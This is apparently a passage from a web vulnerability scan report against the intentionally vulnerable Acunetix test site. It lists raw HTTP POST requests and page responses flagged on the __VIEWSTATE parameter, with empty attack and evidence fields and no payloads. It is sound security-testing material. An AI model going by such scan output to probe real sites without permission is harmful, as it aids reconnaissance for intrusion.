Request Body - size: 1,067 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8377&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAABQJq%2FY2ghkZGRbVzgjENz9lvG04FiZbdtey9VJdw%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKU%2BKTPCQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAz17iu9Vik5ObknVjju95m%2BxWz%2B
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:10:08 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAABQJq/Y2ghkZGRbVzgjENz9lvG04FiZbdtey9VJdw==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKU+KTPCQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBAz17iu9Vik5ObknVjju95m+xWz+" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:White" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1059 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,059 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8385&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAACeefje2ghkZGSRVdvHDbIQ6owpw4rE58aznnf2FQ%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLLm9fJBwL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBH5v9jQhGnqo0HE0J9KlFHCqSDdM
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:33:29 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAACeefje2ghkZGSRVdvHDbIQ6owpw4rE58aznnf2FQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLLm9fJBwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBH5v9jQhGnqo0HE0J9KlFHCqSDdM" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:White" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1063 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
